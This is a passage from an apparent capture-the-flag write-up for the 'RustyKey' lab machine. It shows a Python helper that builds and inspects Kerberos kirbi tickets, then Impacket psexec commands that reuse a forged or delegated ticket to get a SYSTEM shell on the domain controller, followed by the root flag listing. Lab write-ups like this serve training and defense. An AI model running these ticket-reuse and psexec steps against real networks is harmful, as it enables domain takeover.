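    ticket = _der(0x61, _seq(_c(0, _int(5)), _c(1, _gs(realm)), _c(2, _pname(*svc)),
                             _c(3, _seq(_c(0, _int(18)), _c(2, _der(0x04, b"\xAA" * 8))))))
    cred = _der(0x76, _seq(_c(0, _int(5)), _c(1, _int(22)), _c(2, _seq(ticket)),
                           _c(3, _seq(_c(0, _int(etype)), _c(2, _der(0x04, cipher))))))
    return base64.b64encode(cred).decode()


if __name__ == "__main__":
    for key, val in summarize_kirbi(build_sample_kirbi()).items():
        print(f"{key:15s} {val}")
```

Run it as a script to print the summary of the constructed sample, or pass the base64 string from a Rubeus export to `summarize_kirbi` to inspect a real one. The `ticket_service` field comes from the `Ticket`'s own `sname` and should match `service` from the credential info; the `client`, `service` and validity fields are also what the domain controller records in its own service-ticket-request event (4769) for the S4U2proxy step shown above, which is the record a defender would correlate this activity against.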

We point `KRB5CCNAME` at the converted cache and use `psexec.py` from the **Impacket** suite, authenticating with the ticket (`-k -no-pass`), to get a SYSTEM shell on the domain controller:

```java
└─$ export KRB5CCNAME=backupadmin.ccache 

┌──(anurag㉿anurag)-[~/htb/RustyKey]
└─$ impacket-psexec RUSTYKEY.HTB/backupadmin@DC.RUSTYKEY.HTB -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on DC.RUSTYKEY.HTB.....
[*] Found writable share ADMIN$
[*] Uploading file tmhSOAtU.exe
[*] Opening SVCManager on DC.RUSTYKEY.HTB.....
[*] Creating service ycKx on DC.RUSTYKEY.HTB.....
[*] Starting service ycKx.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> 

```

With that, `root.txt` is on the Administrator's desktop:

```java
Directory of C:\Users\Administrator\Desktop

06/24/2025  10:00 AM    <DIR>          .
06/24/2025  10:00 AM    <DIR>          ..
07/02/2025  03:32 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   2,785,824,768 bytes free

```
